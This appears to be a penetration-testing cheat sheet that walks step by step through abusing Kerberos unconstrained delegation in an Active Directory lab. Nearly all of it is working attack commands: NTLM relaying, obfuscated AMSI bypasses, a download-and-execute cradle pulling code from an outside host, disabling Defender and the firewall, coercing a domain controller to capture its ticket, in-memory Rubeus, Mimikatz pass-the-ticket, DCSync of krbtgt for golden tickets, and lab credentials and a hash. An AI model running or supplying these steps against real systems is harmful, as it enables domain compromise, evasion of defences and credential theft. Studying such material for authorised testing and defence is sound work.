Unconstrained delegation Enum
Unconstrained delegation is a configuration that attackers can potentially use to impersonate a user or service account and gain access to sensitive resources in an organization's network. To mitigate the risks associated with unconstrained delegation, organizations should take steps to fully understand such configurations, implement best practices regarding privilege, apply effective remediation steps, and replace unconstrained delegation with resource-based delegation wherever possible.

One way to find unconstrained delegation is to look in bloodhound
MATCH (c {unconstraineddelegation:true}) return c
If you want to search for unconstrained delegation system (out of domain controller) :
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH COLLECT(c1.name) AS domainControllers MATCH (c2 {unconstraineddelegation:true}) WHERE NOT c2.name IN domainControllers RETURN c2

With a socks connection you can only use smbexec or atexec. Neither wmiexec, psexec nor dcomexec will work. (explainations here : https://github.com/SecureAuthCorp/impacket/issues/412 )
Run ntlmrelayx.py and wait for a connecting for fernando.alonzo
sudo ntlmrelayx.py -socks -smb2support -tf unsigned_smb.txt

Run Responder
sudo responder -I enp0s3
Run smbeexe to get interactive shell
sudo proxychains smbexec.py -no-pass 'NORTH'/'fernando.alonzo'@'192.168.56.22 -shell-type powershell

Prepare our server containing Rubeus.exe and our AMSI bypass.
python3 -m http.server 8080
On the shell session bypass AMSI :
#ByPass AMSI
powershell -ep bypass
SET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
$x=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils');$y=$x.GetField('am'+'siCon'+'text',[Reflection.BindingFlags]'NonPublic,Static');$z=$y.GetValue($null);[Runtime.InteropServices.Marshal]::WriteInt32($z,0x41424344)
(new-object system.net.webclient).downloadstring('http://192.168.56.31:8080/amsi_rmouse.txt')|IEX
#check status of Defender
Get-MpComputerStatus
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
netsh advfirewall set allprofiles state off
#Default Writeable Folders
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing
#List AppLocker rules
PS C:\> $a = Get-ApplockerPolicy -effective
PS C:\> $a.rulecollections
Now launch Rubeus in memory with execute assembly.
First we will list the available tickets :
$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.56.31:8080/Rubeus.exe')
$assem = [System.Reflection.Assembly]::Load($data);
[Rubeus.Program]::MainString("triage");
And now force a coerce of the DC NYC to the DC Bronx.
python3 coercer.py -u claudio.ortiz -d north.newyork.local -p bayboy -t NYC.Newyork.local -l Bronx
We look on the triage again :
[Rubeus.Program]::MainString("triage")
And now the tgt of NYC is present
To extract it (relaunch coercer and 1 sec later launch the following dump command): (i don’t know why but the rubeus monitor mode doesn’t want to run in execute assembly)
[Rubeus.Program]::MainString("dump /user:NYC$ /service:krbtgt /nowrap");
We now have the TGT of the domain controller
Let’s continue on linux to pass the ticket and launch dcsync with secretdump :
copy the ticket without space and return line (in vim i do : :%s/\s*\n\s*//g) convert the ticket to ccache use the kerberos ticket and launch secretdump
cat tgt.b64|base64 -d > ticket.kirbi
ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=/workspace/unconstrained/ticket.ccache
secretsdump.py -k -no-pass NEWYORK.LOCAL/'NYC$'@NYC
#Abusing FullControl using PowerView:
import-module .\powerview.ps1
Get-DomainComputer -TrustedToAuth
Triage All Current Tickets (If Elevated List all Users)
.\Rubeus.exe triage
s
List all Current Tickets in Details (If Elevated List all Users)
\Rubeus.exe klist
. .\Invoke-Mimikatz.ps1
invoke-mimikatz
aa81bb97a48748ad89541137bf78001f
#ask dc for a tgt for the student server
#Download kekeo:
https://github.com/gentilkiwi/kekeo/releases
kekeo.exe
tgt::ask /user:student$ /domain:pentesting.local /rc4:aa81bb97a48748ad89541137bf78001f
#ask dc for a tgs for the student server
tgs::s4u /tgt:TGT_student$@PENTESTING.LOCAL_krbtgt~pentesting.local@PENTESTING.LOCAL.kirbi /user:Administrator@pentesting.local /service:time/ad.pentesting.local|ldap/ad.pentesting.local
#use the tgs and inject it
. ..\..\invoke-mimikatz.ps1
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@pentesting.local@PENTESTING.LOCAL_student$@PENTESTING.LOCAL.kirbi"'
#Dcsync to perform a goldent ticket attack
Invoke-Mimikatz -Command '"lsadump::dcsync /user:pentesting\krbtgt"'
#Look at this if it does not work:
https://medium.com/r3d-buck3t/attacking-kerberos-unconstrained-delegation-ef77e1fb7203
#Enable Remote Desktop
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
#Activate the firewall rule
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
#Enable authentication via RDP
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
Last updated